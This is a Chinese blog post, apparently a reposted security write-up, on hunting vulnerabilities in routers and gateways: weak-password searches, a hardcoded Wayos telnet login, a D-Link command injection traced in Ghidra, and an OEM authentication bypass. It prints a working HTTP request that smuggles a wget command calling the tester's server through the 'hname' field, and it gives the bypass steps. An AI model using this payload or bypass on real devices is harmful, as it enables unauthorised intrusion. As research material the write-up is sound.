首页 > 其他分享 >【设备漏洞】挖掘思路

【设备漏洞】挖掘思路

时间:2024-10-12 16:44:32浏览次数:1  
标签:组件 telnet 漏洞 挖掘 思路 设备 路由器

1.信息收集
  1.1 弱口令搜索
  1.2 硬编码问题

2.相同组件及OEM框架挖掘
  2.1 组件漏洞问题
  2.2 OEM漏洞问题

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

文章来源:先知社区

在日常渗透过程中,可能会遇到各种路由,上网行为管理等设备,这时候该怎么去对这些设备进去快速挖掘就成为我们想要解决的问题。

1.信息收集

1.1 弱口令搜索

对于设备黑盒来说,信息收集也是一个比较重要的过程,更多的时候可以去寻找web后台密码,一些设备可以得到比如通过寻找网上的用户指导手册可得,如

也可以通过cnvd以及cve查找相应弱口令设备然后进入fofa或者hunter等搜索引擎搜索到未修复的弱口令进入后台挖掘,因为更多的功能点只能在后台更好的做测试

1.2 硬编码问题

设备常常会开启一些如telnet,ssh服务,也可能在初始化时会以硬编码的方式开启这些服务端口,允许设备被远程连接,也可能是开发者在调试的一些隐藏后门。
例如wayos微盟路由器固件出现过的mqtt协议泄露账户的漏洞
在做固件的仿真模拟执行ps的时候看到了该系统仿真后的shell开启了相关的telnet服务

也在初始化文件中看到确实有该操作

如图我们看到了确实wayos启动了该telnet服务,利用对字符寻找找到了以下文件,对以下文件进行简单分析目标锁定在了mqtt_ai文件

通过对函数的简单寻找锁定到该函数mqtt_ai_sw_telnet_login

对该函数进行简单分析后,该while函数似乎是对telnet登录的一个校验操作

使用该硬编码后登录了该设备的telnet服务

ssh密码寻找,该设备也可能会开启ssh,我们在做仿真模拟的时候,可以查看/etc/shadow文件,也可以试着解密这密码进行漏洞挖掘

2.相同组件及OEM框架挖掘

这是我们每个人都会忽略的点,正如我们挖web的时候,挖java的站点我们常常会想到一些fastjson,log4j2这种会造成漏洞的组件漏洞,以及类似springboot框架类似的框架型漏洞,对于我来说我们所说的设备也有所谓的组件以及框架。

2.1 组件漏洞问题

相对于设备来说也有其相应的组件,我们在做设备挖掘,设备可能会有相应的功能点,正如我以下想说的usb共享存储组件导致的命令执行漏洞,以下举例微盟的路由器以及dlink的路由器进行举例
首先发现了微盟的路由器有该相关漏洞在寻找前台路由器挖掘时,发现了dlink路由器的用户指导手册中具有相同的功能

将dlink固件拉下解开固件包后寻找漏洞路径字符,发现该组件也拥有相同漏洞路径字符

进入审计
首先对该固件丢入ghidra进入分析,在Function栏过滤出主要执行函数system,对该函数点击交叉引用,
得到所有调用system函数的位置

开始反溯system执行的命令中含有可控数据流部分,通过逐个调用点反编译,发现以下可控数据流

这段代码的本来主要目的是设置Samba服务器的用户名。它首先获取两个全局变量的值,然后使用echo
命令将这些值写入/etc/smbusers文件。这样,Samba服务器就可以使用这些用户名进行身份验证,但从
该伪代码可以看出用户输入获取usb_username和use_husername没有进行完全过滤,拼接的命令直接作
为system()参数执行,故此可能引发命令注入
往下看我们可以发现该输出代码从用户输入的hname函数中获取

使用poc进行wget请求

GET /usb_paswd.asp?share_enable=1&passwd=123456&name=login&hpasswd=123456&hname=hlogin%60wget%20http%3A%2F%2F192.168.1.2%3A8000%60&acc_ip=&acc_mac=&acc_wan=0&acc_auth=0&send_email_en=0&send_email_name=0&send_email_pwd=0&device_name=&_=1663771596225 HTTP/1.1

Host:192.168.1.1

User-Agent:Mozilla/5.0(X11;Ubuntu;Linux x86_64; rv:104.0)Gecko/20100101Firefox/104.0

Accept: application/json, text/javascript,*/*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://192.168.1.1/index.htm

Cookie: userid=root; gw_userid=root,gw_passwd=0C667259F7A2069B7C55AB5D95F2FE7B

本机先起一个服务,发送上述数据包发现该被攻击机对攻击机服务器发起了服务

2.2 OEM漏洞问题

正如上述所说,设备也有属于自己的框架,我们可以通过相应的,可以通过寻找一些cve或者cnvd的路由器进行获取一些js获取得到一些类似的系统设备的相同漏洞,或者rce之后做白盒审计发现

如最近的迈普的多业务融合系统和飞鱼星的企业智能上网行为管理的相同漏洞,根据一些引用的静态文件,寻找到两种设备都为使用相同OEM
飞鱼星飞鱼星企业级智能上网行为管理系统

迈普多业务融合系统

发现飞鱼星漏洞在迈普依旧可以使用,如该权限绕过漏洞
迈普多业务融合系统存在权限绕过(未公开poc,通过飞鱼星反溯得到)

然后访问 http://xxx/home/index.htm,丢弃cookie.cgi相同包可以绕过设备登录校验

标签:组件,telnet,漏洞,挖掘,思路,设备,路由器
From: https://www.cnblogs.com/o-O-oO/p/18460838

相关文章

  • Code-Projects Hospital Management System SQL注入漏洞(CVE-2024-8368)复现
    参考文献:code-projects使用PHP的医院管理系统,源代码v1.0/hms/doctor/index.phpSQL注入·问题#1·青銮机器人/CVE·GitHub的国家信息安全漏洞库(cnnvd.org.cn)免责声明本文仅用于安全研究和学习目的。请勿将文中提供的漏洞复现方法、脚本或其他信息用于未经授......
  • JavaScript原型链污染漏洞分析
    原型链污染漏洞CVE:1、yargs-Parser输入验证错误漏洞(CVE-2020-7608)2、tough-cookie安全漏洞(CVE-2023-26136)3、JSON5原型污染漏洞(CVE-2022-46175) 漏洞描述:1、yargs-Parser输入验证错误漏洞(CVE-2020-7608):yargs-parser是一款选项解析器。yargs-parser13.1.2之前......
  • 地平线双目深度估计参考算法 StereoNetPlus优化 思路解读
    【参考算法】地平线双目深度估计参考算法StereoNetPlus-v1.2.11.引言本文将介绍地平线基于公版的双目深度估计算法StereoNet做的优化设计。首先介绍了双目深度估计的原理以及双目点云和Lidar点云的对比,然后由公版StereoNet的介绍切入到地平线参考算法的针对性优化,最后对......
  • 【反转链表】【K个一组翻转链表】两个问题具体思路,文中含多种解法(附完整代码)
    文章目录前言一、如何理解反转链表?二、反转链表1.方法一(递归)方法二(迭代)三、K个一组翻转链表前言本文将围绕【反转链表】问题展开详细论述。采用【递归法】【迭代法】同时,还将进一步升级该问题,讨论【K个一组翻转链表】一、如何理解反转链表?题目链接:[点击......
  • 虚拟化溢出漏洞的安全测试
    使用源码编译方式通过安全测试对VMwareWorkstation进行缓冲区溢出与远程代码执行(RCE)测试的完整流程注意:VMwareWorkstation是一款商业软件,其源代码为闭源状态。未经授权进行逆向工程、漏洞挖掘或任何形式的安全测试可能违反相关法律法规和软件许可协议。以下内容仅供学......
  • 方正畅享全媒体新闻采编系统 addOrUpdateOrg xxe漏洞
    0x01产品描述:   方正畅享全媒体新闻采编系统是一个集指挥中心、采集中心、编辑中心、发布中心、绩效考核中心和资料中心为一体的全媒体新闻采编系统‌,主要应用于媒体行业的深度融合,通过大数据和AI技术,实现新闻生产的策、采、编、发、存、传、评的全流程管理‌     ......
  • DATAGERRY REST API身份验证绕过漏洞(CVE-2024-46627)
    0X01产品描述:        ‌DATAGERRY是一个灵活的开源CMDB和资产管理工具,它完全将数据模型的定义留给用户。‌用户只需在一个易于使用的webfrontend中定义自己的对象类型(如服务器、路由器、租赁线路、位置等)。通过DATAGERRY的导出API,存储在DATAGERRY中的CMDB对象可以轻......
  • 运行使用Electron-forge打包的electron package时遇到在js文件中执行的exec命令和在渲
    js文件中执行的exec命令出错很可能是项目中使用了一些非html,css,js的源文件,比如用了Makefile来编译了cpp代码,或者执行的exec命令为cpdir/something.cpp之类的文件操作命令。可以使用修改forge.config.js文件配置的方式,使得npmrunmake的时候自动把Makefile等exec命令中用到......
  • 2023 年和 2024 年最具威胁的 25 种安全漏洞(CWE Top 25)
    目录1.缓冲区溢出(CWE-120)2.代码注入(CWE-94)3.认证缺失(CWE-287)4.访问控制缺失(CWE-284)5.SQL注入(CWE-89)6.跨站脚本(XSS)(CWE-79)7.不安全的反序列化(CWE-502)8.脆弱的随机数生成(CWE-331)9.信息泄露(CWE-200)10.不安全的直接对象引用(CWE-63......
  • 链表【两数相加】具体思路——【递归】【迭代】【暴力】(附完整代码)
    文章目录前言一、问题引入,如何理解【链表】两数相加?二、方法一(固定数组暴力)三、方法二(递归法)四、方法三(迭代法)前言本文将介绍【链表】两数相加对于这一问题将采用多种思路方法来解决【暴力】【递归法】【迭代法】一、问题引入,如何理解【链表】两数相加?题目链接......